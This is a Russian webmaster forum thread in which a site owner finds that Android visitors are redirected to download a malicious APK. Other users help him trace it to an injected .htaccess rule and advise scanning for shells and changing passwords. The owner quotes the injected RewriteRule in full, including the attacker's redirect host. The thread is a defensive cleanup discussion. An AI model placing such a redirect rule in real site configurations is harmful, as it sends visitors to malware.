При входе на сайт предлагает скачать "mobilnaya_versiya.apk"

OF
На сайте с 03.04.2014
Offline
75
2266

Предлагает скачать мобильную версию mobilnaya_versiya.apk если заходишь на сайт с андроид устройств. С виндовс все нормально. И так по всем сайтам на хостинге (около 10). Вот пример одного из них disum.ru.

Проверял на вирусы через хостера - ничего не нашел.

Подозрительно то, сегодня одновременно в 14:20 на нескольких сайтах был изменен файл .htaccess

Но на большинстве сайтов вообще не было никаких изменений файлов (если верить last modified)

AP
На сайте с 14.04.2010
Offline
122
#1

Код редиректа обычно ставят в файл .htaccess

Файл .htaccess с редиректом необязательно должен быть в корне сайта, он моржет находиться на уровень выше в директории www или выше.

Редирект происходит на сайт http://mobvs.ru/e/6746

адрес ПП найти не удалось, точнее лень перебирать все адреса ПП

можете сами перебрать

http://bgp.he.net/ip/91.202.63.75#_dns

G.Ilnur:
Отпишите в личку, помогу

он свежерег, ему нельзя писать в личку

[Удален]
#2

Контакты в моем профиле указаны.

OF
На сайте с 03.04.2014
Offline
75
#3

Единственная ссылка, которую я нашел в .htaccess это http://server.7od.org/?update&source=%

Но она есть во всех файлах, даже тех которые не менялись.

---------- Добавлено 04.04.2014 в 00:41 ----------

А, точно. Удалил строку со ссылкой RewriteRule ^(.*)$ http://server.7od.org/?update&source=%{HTTP_HOST} [L,R=302]

И все заработало!

Теперь бегу пароли на хостинг и MySQL менять. Или как еще эта гадость проникает?

K5
На сайте с 21.07.2010
Offline
209
#4

шелл-скрипты ищите, строка с редиректом - это результат, а надо найти причину!!!

ай-болитом проверьте...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
СолдафончеГ
На сайте с 04.12.2008
Offline
96
#5

Это ПП mobilabs.biz напишите саппорту, предоставьте ссылку http://mobvs.ru/e/6746 и забанят этого нехорошего человека.

R
На сайте с 24.01.2008
Offline
180
#6
OldFun:

Теперь бегу пароли на хостинг и MySQL менять. Или как еще эта гадость проникает?

Смена паролей от всего + возможно сам хост может влиять на взлом.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
OF
На сайте с 03.04.2014
Offline
75
#7

В результате рег.ру таки увидел на сайтах вирусы. Все в htaccess. Удалил во всех файлах вредоносный код. Второй день все тихо и спокойно.

Теперь и с этим зверем знаком. А то до этого только спам боты селились)

Спасибо всем за помощь!🍻

gregzem
На сайте с 22.11.2004
Offline
134
#8

В .htaccess скорее всего стоит мобильный редирект. Либо шелл, либо по ftp увели пароли. Просканируйте сайт AI-BOLIT'ом http://revisium.com/ai/ и проверьте по дате изменения файлов доступ к .htaccess в ftp логе (его можно запросить в тех поддержке хостинга)

Антивирус для ISPmanager (https://revisium.com/ru/products/antivirus_for_ispmanager/) | Антивирус для Plesk (https://plesk.revisium.com) | Профессиональное лечение и защита сайтов (https://revisium.com/)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий